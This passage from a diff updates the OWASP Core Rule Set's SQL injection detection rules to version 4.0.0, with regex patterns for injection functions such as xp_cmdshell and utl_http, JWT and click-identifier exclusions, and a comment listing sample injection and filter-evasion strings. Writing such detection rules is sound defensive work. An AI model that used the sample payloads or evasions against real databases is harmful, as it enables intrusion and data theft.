)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:assword|eriod_(?:add|diff)|g_sleep|i|o(?:sition|w(?:er)?)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wto(?:hex|nhex(?:toraw)?))|e(?:lease_lock|p(?:eat|lace)|verse)|ight|o(?:und|w_count)|pad|trim)|s(?:chema|e(?:c(?:ond|_to_time)|ssion_user)|ha[1-2]?|ig?n|leep|oundex|pace|qrt|t(?:d(?:dev(?:_(?:po|sam)p)?)?|r(?:cmp|_to_date))|u(?:b(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|m)|ys(?:date|tem_user))|t(?:an|ime(?:diff|_(?:format|to_sec)|stamp(?:add|diff)?)?|o_(?:base64|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|ix_timestamp)|p(?:datexml|per)|ser|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|v(?:a(?:lues|r(?:iance|_(?:po|sam)p))|ersion)|we(?:ek(?:day|ofyear)?|ight_string)|xmltype|year(?:week)?)[^0-9A-Z_a-z]*?\(" \ "id:942410,\ phase:2,\ block,\ @@ -1049,24 +1210,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # The former rule id 942410 was split into three new rules: 942410, 942470, 942480 # -# Regexp generated from util/regexp-assemble/regexp-942470.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942470.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942470.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942470 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|(?:servicecontro|cmdshel)l|e(?:xecresultset|numdsn)|ntsec(?:_enumdomains)?|terminate(?:_process)?|availablemedia|loginconfig|filelist|dirtree|makecab)|s(?:p_(?:(?:addextendedpro|sqlexe)c|p(?:assword|repare)|replwritetovarbin|is_srvrolemember|execute(?:sql)?|makewebtask|oacreate|help)|ql_(?:longvarchar|variant))|open(?:owa_util|rowset|query)|(?:n?varcha|tbcreato)r|autonomous_transaction|db(?:a_users|ms_java)|utl_(?:file|http)))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)" \ "id:942470,\ phase:2,\ block,\ @@ -1082,24 +1239,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # The former rule id 942410 was split into three new rules: 942410, 942470, 942480 # -# Regexp generated from util/regexp-assemble/regexp-942480.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942480.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942480.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942480 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:\b(?:(?:s(?:elect\b.{1,100}?\b(?:(?:(?:length|count)\b.{1,100}?|.*?\bdump\b.*)\bfrom|to(?:p\b.{1,100}?\bfrom|_(?:numbe|cha)r)|(?:from\b.{1,100}?\bwher|data_typ)e|instr)|ys_context)|in(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)|u(?:nion\b.{1,100}?\bselect|tl_inaddr)|group\b.*?\bby\b.{1,100}?\bhaving|d(?:elete\b\W*?\bfrom|bms_\w+\.)|load\b\W*?\bdata\b.*?\binfile)\b|print\b\W*?\@\@)|(?:;\W*?\b(?:shutdown|drop)|collation\W*?\(a|\@\@version)\b|'(?:s(?:qloledb|a)|msdasql|dbo)'))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\.|elete\b[^0-9A-Z_a-z]*?\bfrom)|(?:group\b.*?\bby\b.{1,100}?\bhav|overlay\b[^0-9A-Z_a-z]*?\(.*?\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\b[^0-9A-Z_a-z]*?\bjoin|sert\b[^0-9A-Z_a-z]*?\binto|to\b[^0-9A-Z_a-z]*?\b(?:dump|out)file)|load\b[^0-9A-Z_a-z]*?\bdata\b.*?\binfile|s(?:elect\b.{1,100}?\b(?:(?:.*?\bdump\b.*|(?:count|length)\b.{1,100}?)\bfrom|(?:data_typ|from\b.{1,100}?\bwher)e|instr|to(?:_(?:cha|numbe)r|p\b.{1,100}?\bfrom))|ys_context)|u(?:nion\b.{1,100}?\bselect|tl_inaddr))\b|print\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\(a|@@version|;[^0-9A-Z_a-z]*?\b(?:drop|shutdown))\b|'(?:dbo|msdasql|s(?:a|qloledb))'" \ "id:942480,\ phase:2,\ block,\ @@ -1115,11 +1268,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # @@ -1157,11 +1309,38 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" +# +# -=[ Exclusion rule for 942440 ]=- +# +# Prevent FPs against Facebook click identifier +# +SecRule ARGS_GET:fbclid "@rx [a-zA-Z0-9_-]{61,61}" \ + "id:942441,\ + phase:2,\ + pass,\ + t:none,t:urlDecodeUni,\ + nolog,\ + ctl:ruleRemoveTargetById=942440;ARGS:fbclid,\ + ver:'OWASP_CRS/4.0.0'" + +# +# -=[ Exclusion rule for 942440 ]=- +# +# Prevent FPs against Google click identifier +# +SecRule ARGS_GET:gclid "@rx [a-zA-Z0-9_-]{91,91}" \ + "id:942442,\ + phase:2,\ + pass,\ + t:none,t:urlDecodeUni,\ + nolog,\ + ctl:ruleRemoveTargetById=942440;ARGS:gclid,\ + ver:'OWASP_CRS/4.0.0'" # # -=[ Detect SQL Comment Sequences ]=- @@ -1172,7 +1351,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ # DROP sampletable;-- # admin'-- # DROP/*comment*/sampletable -# DR/**/OP/*bypass blacklisting*/sampletable +# DR/**/OP/*bypass deny listing*/sampletable # SELECT/*avoid-spaces*/password/**/FROM/**/Members # SELECT /*!32302 1/0, */ 1 FROM tablename # ‘ or 1=1# @@ -1185,7 +1364,21 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ # 0/**/union/*!50000select*/table_name`foo`/**/ # ------------------------- # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:/\*!?|\*/|[';]--|--[\s\r\n\v\f]|--[^-]*?-|[^&-]#.*?[\s\r\n\v\f]|;?\\x00)" \ +# The chained rule is designed to prevent false positives by specifically +# targeting JWT tokens. Starting with 'ey' targets JWT tokens, where the 'ey' +# prefix corresponds to the beginning of the Base64-encoded header section. +# +# example: +# $ echo '{"' | base64 +# eyIK +# +# Regular expressions generated from regex-assembly/942440.ra and regex-assembly/942440-chain1.ra. +# To update the regular expressions run the following shell scripts +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942440 +# crs-toolchain regex update 942440-chain1 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\v]|[^\-]*?-)|[^&\-]#.*?[\s\v]|;?\x00" \ "id:942440,\ phase:2,\ block,\ @@ -1201,15 +1394,21 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + chain" + SecRule MATCHED_VARS "!@rx ^ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.[\-0-9A-Z_a-z]+$" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" # # -=[ SQL Hex Evasion Methods ]=- # +# Hex encoding detection: +# (?i:\b0x[a-f\d]{3,}) will match any 3 or more hex bytes after "0x", together forming a hexadecimal payload(e.g 0xf00, 0xf00d and so on) +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b0x[a-f\d]{3,})" \ "id:942450,\ phase:2,\ @@ -1226,10 +1425,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # @@ -1259,7 +1458,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU # ('if'). That rule runs in paranoia level 3 or higher since it is prone to # false positives in natural text. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:`((?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+\/]{4})+(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?)`)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:`(?:(?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)`)" \ "id:942510,\ phase:2,\ block,\ @@ -1275,16 +1474,205 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# Regular expression generated from regex-assembly/942520.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942520 # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\v]*?(?:(?:is[\s\v]+not|not[\s\v]+(?:like|glob|(?:betwee|i)n|null|regexp|match)|mod|div|sounds[\s\v]+like)\b|[%-&\*-\+\-/<->\^\|])" \ + "id:942520,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects basic SQL authentication bypass attempts 4.0/4',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# Complementary rule to PL2 942520 that block and/or-based bypasses. +# It blocks data with odd number of quotes and then (and|or). +# +# The rule uses the expression ^b*a*(b*a*b*a*)* to odd number of a's. It's not +# vulnerable to ReDos as it executes linearly many steps compared to input size. +# +# Regular expression generated from regex-assembly/942521.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942521 +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)^(?:[^']*?(?:'[^']*?'[^']*?)*?'|[^\"]*?(?:\"[^\"]*?\"[^\"]*?)*?\"|[^`]*?(?:`[^`]*?`[^`]*?)*?`)[\s\v]*([0-9A-Z_a-z]+)\b" \ + "id:942521,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects basic SQL authentication bypass attempts 4.1/4',\ + logdata:'Matched Data: %{TX.0} found within %{TX.942521_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.942521_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "@rx ^(?:and|or)$" \ + "t:none,\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# Complementary rule to PL2 942521 that block escaped quotes followed by (and|or) +# +SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b" \ + "id:942522,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects basic SQL authentication bypass attempts 4.1/4',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# This is a sibling of rule 942100 that adds checking of the path. +# +# REQUEST_BASENAME provides the last url segment (slash excluded). +# This segment is the most likely to be used for injections. Stripping out +# the slash permits libinjection to do not consider it as a payload starting +# with not unary arithmetical operators (not a valid SQL command, e.g. +# '/9 union all'). The latter would lead to do not detect malicious payloads. +# +# REQUEST_FILENAME matches SQLi payloads inside (or across) other segments +# of the path. Here, libinjection will detect a true positive only if +# the url leading slash is considered as part of a comment block or part +# of a string (with a quote or double quote after it). In these circumstances, +# previous slashes do not affect libinjection result, making it able to detect +# some SQLi inside the path. +# +SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \ + "id:942101,\ + phase:1,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,\ + msg:'SQL Injection Attack Detected via libinjection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ SQL Function Names ]=- +# +# This rule is a stricter sibling of 942151. +# This rule 942152 checks for the same regex in request headers referer and user-agent. +# +# Regular expression generated from regex-assembly/942152.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942152 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[1-2]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \ + "id:942152,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:lowercase,\ + msg:'SQL Injection Attack: SQL function name detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# This rule is a stricter sibling of 942320. +# It checks for the same regex in request headers referer and user-agent. +# +# Regular expression generated from regex-assembly/942321.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942321 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\v]+(?:function|procedure)[\s\v]*?[0-9A-Z_a-z]+[\s\v]*?\([\s\v]*?\)[\s\v]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\s\v]*?[0-9A-Z_a-z]+|iv[\s\v]*?\([\+\-]*[\s\v\.0-9]+,[\+\-]*[\s\v\.0-9]+\))|exec[\s\v]*?\([\s\v]*?@|(?:lo_(?:impor|ge)t|procedure[\s\v]+analyse)[\s\v]*?\(|;[\s\v]*?(?:declare|open)[\s\v]+[\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\s\v]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)" \ + "id:942321,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects MySQL and PostgreSQL stored procedure/function injections',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -1298,7 +1686,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,skipAf # # This is a stricter sibling of rule 942250. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W+\d*?\s*?having\s*?[^\s\-]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W+\d*?\s*?\bhaving\b\s*?[^\s\-]" \ "id:942251,\ phase:2,\ block,\ @@ -1314,10 +1702,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # This rule is a stricter sibling of 942330. See that rule for a # description and overview. @@ -1338,10 +1726,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # [ SQL Injection Character Anomaly Usage ] @@ -1364,7 +1752,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){8})" \ "id:942420,\ - phase:2,\ + phase:1,\ block,\ capture,\ 